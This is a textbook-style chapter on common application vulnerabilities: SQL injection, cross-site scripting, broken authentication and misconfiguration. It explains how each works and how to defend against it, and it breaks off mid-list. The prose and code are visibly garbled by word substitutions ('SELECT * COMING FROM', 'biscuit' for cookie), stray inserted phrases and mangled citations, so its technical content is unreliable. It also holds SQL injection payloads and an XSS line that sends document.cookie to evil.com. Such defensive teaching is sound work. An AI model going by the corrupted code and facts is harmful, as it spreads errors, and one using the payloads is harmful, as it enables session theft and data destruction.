Threat Landscape and Common Vulnerabilities

# Chapter 5: Threat Landscape and Common Vulnerabilities
Just about every application operates throughout an environment full involving threats – harmful actors constantly searching for weaknesses to exploit. Understanding the risk landscape is important for defense. In this chapter, we'll survey the nearly all common varieties of program vulnerabilities and episodes seen in the wild today. We are going to discuss how these people work, provide practical instances of their fermage, and introduce greatest practices to avoid these people. This will lay down the groundwork for later chapters, which can delve deeper straight into how to construct security into the development lifecycle and specific defenses.

Over the decades, certain categories of vulnerabilities have emerged as perennial issues, regularly appearing in security assessments in addition to breach reports. Industry resources just like the OWASP Top 10 (for web applications) plus CWE Top 25 (common weaknesses enumeration) list these usual suspects. Let's check out some of typically the major ones:

## Injection Attacks (SQL, Command Injection, and many others. )
- **Description**: Injection flaws occur when an program takes untrusted suggestions (often from an user) and nourishes it into an interpreter or command word in a way that alters the particular intended execution. The particular classic example will be SQL Injection (SQLi) – where end user input is concatenated into an SQL query without right sanitization, allowing you utilize their own SQL commands. Similarly, Command word Injection involves inserting OS commands, LDAP Injection into LDAP queries, NoSQL Shot in NoSQL sources, and so upon. Essentially, the application neglects to distinguish information from code instructions.

- **How this works**: Consider a new simple login form that takes the username and password. If the server-side code naively constructs a question such as: `SELECT * COMING FROM users WHERE user name = 'alice' PLUS password = 'mypassword'; `, an opponent can input something like `username: alice' OR '1'='1` plus `password: anything`. The resulting SQL would get: `SELECT * COMING FROM users WHERE login = 'alice' OR '1'='1' AND username and password = 'anything'; `. The `'1'='1'` situation always true can make the query return all users, effectively bypassing typically the password check. This particular is a basic sort of SQL injections to force the login.
More maliciously, an attacker can terminate the query through adding `; DROP TABLE users; --` to delete typically the users table (a destructive attack on integrity) or `; SELECT credit_card THROUGH users; --` in order to dump sensitive files (a confidentiality breach).
- **Real-world impact**: SQL injection features been behind a few of the largest data breaches on record. We all mentioned the Heartland Payment Systems breach – in 08, attackers exploited a great SQL injection within a web application in order to ultimately penetrate internal systems and rob millions of credit rating card numbers​
TWINGATE. COM
.  threat modeling : the TalkTalk 2015 breach in britain, in which a teenager utilized SQL injection to reach the personal info of over one hundred and fifty, 000 customers. Typically the subsequent investigation unveiled TalkTalk had kept an obsolete web site with an acknowledged SQLi flaw on the web, and hadn't patched a database weeknesses from 2012​
ICO. ORG. UK
​
ICO. ORG. UK
. TalkTalk's CEO described it as the basic cyberattack; without a doubt, SQLi was well-understood for a 10 years, yet the company's failure to sterilize inputs and revise software resulted in a serious incident – they were fined and suffered reputational loss.
These illustrations show injection assaults can compromise privacy (steal data), honesty (modify or delete data), and supply (if data is wiped, service will be disrupted). Even today, injection remains a new common attack vector. In fact, OWASP's 2021 Top Ten still lists Injections (including SQL, NoSQL, command injection, and so forth. ) as a top rated risk (category A03: 2021)​
IMPERVA. POSSUINDO
.
- **Defense**: Typically the primary defense in opposition to injection is type validation and outcome escaping – make sure that any untrusted files is treated simply because pure data, never ever as code. Employing prepared statements (parameterized queries) with destined variables is the gold standard for SQL: it divides the SQL signal from your data values, so even when an user goes in a weird string, it won't crack the query composition. For example, utilizing a parameterized query inside Java with JDBC, the previous sign in query would be `SELECT * COMING FROM users WHERE username =? AND pass word =? `, in addition to the `? ` placeholders are certain to user inputs safely and securely (so `' OR EVEN '1'='1` would always be treated literally since an username, which in turn won't match virtually any real username, quite than part involving SQL logic). Comparable approaches exist with regard to other interpreters.
About top of that, whitelisting input approval can restrict what characters or format is allowed (e. g., an login name could be restricted to be able to alphanumeric), stopping many injection payloads at the front door​
IMPERVA. COM
. Also, encoding output correctly (e. g. HTML encoding to avoid script injection) is usually key, which we'll cover under XSS.
Developers should never ever directly include raw input in directions. Secure frameworks in addition to ORM (Object-Relational Mapping) tools help simply by handling the query building for you. Finally, least privilege helps mitigate impact: the database accounts used by the app should include only necessary benefits – e. g. it should not possess DROP TABLE privileges if not needed, to prevent the injection from carrying out irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting refers to a class of weaknesses where an software includes malicious intrigue within the context associated with a trusted website. Unlike injection straight into a server, XSS is about injecting into the content of which other users see, commonly in a web web page, causing victim users' browsers to carry out attacker-supplied script. There are a few types of XSS: Stored XSS (the malicious script is definitely stored on the particular server, e. grams. inside a database, plus served to various other users), Reflected XSS (the script will be reflected off of the hardware immediately inside a response, often using a lookup query or error message), and DOM-based XSS (the susceptability is in client-side JavaScript that insecurely manipulates the DOM).

- **How it works**: Imagine a communication board where customers can post responses. If the application will not sanitize CODE tags in feedback, an attacker can post a remark like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any user who views that will comment will by mistake run the screenplay in their visitor. The script above would send typically the user's session biscuit to the attacker's server (stealing their very own session, hence permitting the attacker to impersonate them on the site – a confidentiality plus integrity breach).
Within a reflected XSS situation, maybe the site shows your input on an error page: if you pass a script in typically the URL along with the web-site echoes it, that will execute in the browser of whoever clicked that destructive link.
Essentially, XSS turns the victim's browser into the unwitting accomplice.
-- **Real-world impact**: XSS can be very serious, especially in highly trusted sites (like internet sites, web mail, banking portals). A famous early example of this was the Samy worm on Web sites in 2005. A user named Samy found out a stored XSS vulnerability in MySpace profiles. He designed a worm: some sort of script that, whenever any user looked at his profile, it would add your pet as a friend and copy the script to the particular viewer's own profile. Like that, anyone more viewing their profile got infected also. Within just something like 20 hours of relieve, over one million users' profiles acquired run the worm's payload, making Samy one of the fastest-spreading malware of all time​
SOBRE. WIKIPEDIA. ORG
. The worm itself just displayed the expression "but most associated with all, Samy is usually my hero" in profiles, a relatively harmless prank​
SOBRE. WIKIPEDIA. ORG
. Even so, it was a wake-up call: if a good XSS worm could add friends, that could just just as quickly create stolen personal messages, spread junk e-mail, or done additional malicious actions upon behalf of consumers. Samy faced lawful consequences for this specific stunt​
EN. WIKIPEDIA. ORG
.
In an additional scenario, XSS can be used to hijack accounts: intended for instance, a shown XSS in the bank's site could possibly be used via a scam email that techniques an user in to clicking an WEB ADDRESS, which then completes a script to be able to transfer funds or steal session tokens.
XSS vulnerabilities experience been found in web sites like Twitter, Myspace (early days), and countless others – bug bounty courses commonly receive XSS reports. While many XSS bugs are associated with moderate severity (defaced UI, etc. ), some could be crucial if they permit administrative account takeover or deliver viruses to users.
-- **Defense**: The cornerstone of XSS defense is output encoding. Any user-supplied written content that is exhibited within a page ought to be properly escaped/encoded so that this should not be interpreted as active script. Regarding example, if an end user writes ` bad() ` in a comment, the server need to store it after which output it because `< script> bad()< /script> ` and so that it comes up as harmless text, not as a good actual script. Modern web frameworks usually provide template engines that automatically avoid variables, which prevents most reflected or even stored XSS by default.
Another important defense is Articles Security Policy (CSP) – a header that instructs windows to only execute intrigue from certain sources. A well-configured CSP can mitigate the particular impact of XSS by blocking inline scripts or external scripts that aren't explicitly allowed, even though CSP may be intricate to set finished without affecting web page functionality.
For developers, it's also critical in order to avoid practices love dynamically constructing CODE with raw files or using `eval()` on user type in JavaScript. Internet applications can furthermore sanitize input to be able to strip out banned tags or features (though this is certainly difficult to get perfect). In summary: validate and sanitize any kind of HTML or JavaScript inputs, use context-appropriate escaping (HTML get away for HTML content material, JavaScript escape with regard to data injected straight into scripts, etc. ), and consider enabling browser-side defenses like CSP.

## Broken Authentication and Session Management
- **Description**: These vulnerabilities require weaknesses in exactly how users authenticate to be able to the application or maintain their verified session. "Broken authentication" can mean a number of issues: allowing weakened passwords, not protecting against brute force, failing to implement proper multi-factor authentication, or perhaps exposing session IDs. "Session management" is definitely closely related – once an end user is logged in, the app generally uses a program cookie or token to keep in mind them; when that mechanism is flawed (e. grams. predictable session IDs, not expiring sessions, not securing the particular cookie), attackers may possibly hijack other users' sessions.

- **How it works**: 1 common example is definitely websites that enforced overly simple pass word requirements or acquired no protection against trying many accounts. Attackers exploit this kind of by using abilities stuffing (trying username/password pairs leaked from other sites) or brute force (trying a lot of combinations). If generally there are not any lockouts or rate limits, an attacker can systematically guess credentials.
One other example: if the application's session cookie (the part of info that identifies a new logged-in session) is definitely not marked together with the Secure flag (so it's sent above HTTP as nicely as HTTPS) or even not marked HttpOnly (so it can certainly be accessible to scripts), it might be stolen via network sniffing or XSS. When an attacker provides a valid session token (say, lost from an unconfident Wi-Fi or through an XSS attack), they might impersonate that will user without seeking credentials.
There possess also been common sense flaws where, with regard to instance, the username and password reset functionality is usually weak – probably it's susceptible to a good attack where a good attacker can reset to zero someone else's username and password by modifying parameters (this crosses straight into insecure direct object references / gain access to control too).
Total, broken authentication masks anything that allows an attacker to be able to either gain recommendations illicitly or bypass the login making use of some flaw.
- **Real-world impact**: We've all seen information of massive "credential dumps" – millions of username/password sets floating around coming from past breaches. Opponents take these plus try them on the subject of other services (because lots of people reuse passwords). This automated abilities stuffing has guided to compromises regarding high-profile accounts about various platforms.
An example of broken auth was your case in 2012 where LinkedIn experienced a breach plus 6. 5 zillion password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. APRESENTANDO
​
NEWS. SOPHOS. POSSUINDO
. The weakened hashing meant assailants cracked most involving those passwords within just hours​
NEWS. SOPHOS. COM
​
REPORTS. SOPHOS. POSSUINDO
. Even worse, a few decades later it flipped out the break was actually much larger (over a hundred million accounts). People often reuse passwords, so that infringement had ripple effects across other websites. LinkedIn's failing was basically in cryptography (they didn't salt or use a strong hash), which is portion of protecting authentication data.
Another standard incident type: session hijacking. For occasion, before most sites adopted HTTPS all over the place, attackers about the same network (like a Wi-Fi) could sniff biscuits and impersonate users – a risk popularized with the Firesheep tool in 2010, which often let anyone bug on unencrypted sessions for sites love Facebook. This forced web services to encrypt entire lessons, not just get access pages.
There have also been cases of problematic multi-factor authentication implementations or login bypasses due to logic errors (e. h., an API that will returns different communications for valid vs invalid usernames can allow an assailant to enumerate consumers, or a poorly executed "remember me" expression that's easy to be able to forge). The consequences associated with broken authentication are usually severe: unauthorized access to user accounts, data breaches, identity theft, or unauthorized transactions.
- **Defense**: Protecting authentication needs a multi-pronged approach:
-- Enforce strong username and password policies but inside reason. Current NIST guidelines recommend enabling users to choose long passwords (up to 64 chars) and not requiring regular changes unless there's indication of compromise​
JUMPCLOUD. COM
​
AUDITBOARD. COM
. Rather, check passwords towards known breached pass word lists (to disallow "P@ssw0rd" and the like). Also motivate passphrases that happen to be much easier to remember yet hard to think.
- Implement multi-factor authentication (MFA). The password alone will be often not enough these types of days; providing a choice (or requirement) to get a second factor, like an one-time code or a push notification, significantly reduces the chance of account endanger even if account details leak. Many major breaches could include been mitigated by MFA.
- Protected the session tokens. Use the Safeguarded flag on pastries so they are usually only sent over HTTPS, HttpOnly and so they aren't accessible via JavaScript (mitigating some XSS impact), and consider SameSite to prevent all of them from being directed in CSRF assaults (more on CSRF later). Make treatment IDs long, random, and unpredictable (to prevent guessing).
instructions Avoid exposing period IDs in URLs, because they may be logged or released via referer headers. Always prefer biscuits or authorization headers.
- Implement bank account lockout or throttling for login efforts. After say 5-10 failed attempts, possibly lock the account for a period or even increasingly delay reactions. Also use CAPTCHAs or perhaps other mechanisms if automated attempts are usually detected. However, be mindful of denial-of-service – some sites opt for smoother throttling to prevent letting attackers secure out users simply by trying bad security passwords repeatedly.
- Session timeout and logout: Expire sessions after a reasonable period of inactivity, and totally invalidate session tokens on logout. It's surprising how many apps in the past didn't appropriately invalidate server-side period records on logout, allowing tokens to be re-used.
- Focus on forgot password moves. Use secure tokens or links by means of email, don't expose whether an customer exists or certainly not (to prevent end user enumeration), and guarantee those tokens run out quickly.
Modern frameworks often handle the lot of this particular for you personally, but misconfigurations are typical (e. g., a developer may accidentally disable some sort of security feature). Regular audits and assessments (like using OWASP ZAP or other tools) can capture issues like missing secure flags or even weak password guidelines.
Lastly, monitor authentication events.  autonomous decision making  (like a single IP trying a huge number of a, or one account experiencing numerous been unsuccessful logins) should lift alarms. This overlaps with intrusion recognition.
To emphasize, OWASP's 2021 list phone calls this category Recognition and Authentication Failures (formerly "Broken Authentication") and highlights the particular importance of such things as MFA, not applying default credentials, plus implementing proper security password handling​
IMPERVA. POSSUINDO
. They note of which 90% of software tested had challenges in this area in several form, which is quite scary.

## Security Misconfiguration
- **Description**: Misconfiguration isn't just one weeknesses per se, although a broad class of mistakes in configuring the application or its surroundings that lead to be able to insecurity. This may involve using predetermined credentials or adjustments, leaving unnecessary benefits enabled, misconfiguring safety headers, or not solidifying the server. Fundamentally, the software could possibly be secure in idea, nevertheless the way it's deployed or configured opens a hole.

- **How this works**: Examples associated with misconfiguration:
- Leaving default admin accounts/passwords active. Many software program packages or gadgets historically shipped with well-known defaults